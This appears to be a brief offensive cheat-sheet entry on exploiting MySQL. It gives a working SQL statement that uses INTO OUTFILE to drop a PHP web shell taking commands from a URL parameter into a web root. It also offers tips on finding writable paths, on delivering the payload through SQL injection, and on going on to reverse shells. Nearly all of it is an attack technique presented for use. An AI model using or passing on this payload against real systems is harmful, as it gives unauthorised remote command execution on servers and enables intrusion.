Exploiting MySQL

You can “upload” reverse shells using MySQL using INTO OUTFILE:

SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/cmd.php';

The path may require some brute-forcing or additional reconnaissance; sometimes you can force an error to return a (potentially) writeable path. Depending on how the application you’re attacking is configured, it may be possible to exploit this via SQLi.

This can be used to bootstrap reverse shells.